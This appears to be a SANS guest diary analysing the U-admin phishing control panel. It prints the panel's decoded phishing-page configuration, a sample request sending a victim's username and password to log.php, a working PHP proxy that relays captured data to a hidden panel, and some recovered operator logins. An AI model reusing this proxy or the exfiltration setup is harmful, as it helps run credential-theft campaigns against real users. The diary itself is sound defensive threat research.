This is a guest diary provided by Remco Verhoef.

A few months ago we had an investigation regarding an ongoing phishing attack. While researching the case we encountered the U-admin control panel, version 2.7 and we were able to collect the source code for the panel.

From all the control panels we’ve seen, this one looks quite fresh and professional, besides the English spelling errors, it contains user management, plugins, news, and localization. The panel uses a modernish stack, consisting of PHP, Bootstrap, Angular, and JQuery. The underlying database is SQLite3, which makes it easy to deploy on any (hacked) server.

The phishing page itself consists of an encoded javascript file, which contains the body of the page. The script uses the function named _kaktys_encode to decode the body, this function name is very specific for this attack. Other characteristics of the phishing websites are the use of the files css.css and form.js. Also interesting is the use of uniquely generated URLs for each individual session in the URL. After decoding the script, the configuration is shown. The configuration consists of several fields, like the bid (project identifier), the control panel home and the bb_link to redirect to when data has been entered.

<script type="text/javascript">

var bid = "e99f1d4f321797d2df39fef871cffb93"

var php_js = {"device":"null","texts":"{}","lng":"en","file":"somefilelink","query":"i=1","link":"link","bb_link":"https:\/\/x.y.z\/inloggen","home":"http:\/\/127.0.0.1:8089\/uadmin\/gates\/log.php","relative_root":"..\/..\/","parent_folders":"e99f1d4f321797d2df39fef871cffb93\/login\/"}</script>

<script type="text/javascript" src="form/form.js?v=5a36bc91d4199"></script>

When a phished user has entered confidential information, all data will be forwarded through the proxy script to the panel. The panel will show the information inside the logs section. The phisher-admin can add notes to the entry, multiple entries will be grouped to the same. It records the user-agent, remote address, entered fields and comments. The submission is being done by a URL encoded ajax call to log.php similar to the following:

/uadmin/gates/log.php?sl&done&link=link&bid= e99f1d4f321797d2df39fef871cffb93& callback=jQuery311026500820959929117_1523363191308& data={"f2a140da-3b09-4204-a088-e8a2f5b7fcc8":"arstarstarst","UserName":"user","Password":"1234"}&_=1523363191309

When data has been received, the phishing administrator can choose to receive notifications via Jabber. It is configurable to receive notifications on data save or whenever a new bot registers.

The phisher-admin can ban certain bids, which will filter out the bids. This is probably being used to filter outdated campaigns or remove garbage entries.

Using the control panel it is possible to create a proxy script, which will be generated (eg the $real_home will be filled). All requests to the proxy script will be forwarded to the real u-admin panel. The proxy script can be placed on a third server, effectively frustrating ongoing investigations by hiding the panel.

<?php

function get_ip_address(){

foreach (array('HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key)

{

if (array_key_exists($key, $_SERVER) === true){

foreach (explode(',', $_SERVER[$key]) as $ip){

$ip = trim($ip); {

return $ip;}}}}}$_SERVER['REMOTE_ADDR']= get_ip_address();

//http://localhost/uadmin/gates/log.php?callback=fun&link=123

header('Content-Type: application/json');

$ip = $_SERVER['REMOTE_ADDR'];

$ua=$_SERVER['HTTP_USER_AGENT'];

$real_home="http://127.0.0.1/uadmin/gates/log.php";

$query=$_SERVER['QUERY_STRING'];

if(isset($_GET['callback'])){

$ch = curl_init();

curl_setopt($ch,CURLOPT_URL,$real_home."?".$query."&ip=".$ip);

//curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);

curl_setopt($ch,CURLOPT_USERAGENT,$ua);

curl_setopt( $ch, CURLOPT_HTTPHEADER, array("REMOTE_ADDR: $ip","X_FORWARDED_FOR: $ip"));

curl_exec($ch);

} ?>

Another interesting fact is that the panel contains a news section. This could be an indicator of this panel to be delivered in a more structural and professional way compared to others.

There are two databases, .ht_users.db, which is being used for the control panel users and .htBd.db which contains all log entries. Using the sqlite3 recovery tool "undark", I was able to recover previous username and password entries:

werwe:wop0t3xr admin:123 admin:Brazil123 max:venjka anus:qwe

Recovering the log entries, skipping the obscenities, gave some interesting information about alternative usages of the panel. The panel has been used before by another phishing campaign, targeting Ethereum wallets by a cloned site of www.myetherwallet.com. More information can be found at https://www.reddit.com/r/CryptoCurrency/comments/7uzk0f/beware_myetherwallet_clone_found_also_running_a/) Other targets include “bitcoin-tips.com”, “bankofmontreal.com”, “Netflix”, “ING Direct”, “unicredit.it”, “sparkasse.de”, “PayPal” and the latest target “nab.com.au”. Besides those targets, there are many more.

One other interesting artifact that can be found in adm.php is a reference to the Codepen http://codepen.io/kaktys/pen/Zpgpqe.js. This Codepen contains specifics from the panel itself, which could indicate a relation between Kaktys and the control panel.

This leads me to the conclusion of this article. Looking at the professionality of the code, the layout and the functionality I’m giving this control panel 3 out of 5 stars. We wanted to give them 4 stars, but we gave one star less because of an SQL injection vulnerability.

Bonus screenshots:

I will be teaching next: Intrusion Detection In-Depth - SANS Cyber Defense Forum & Training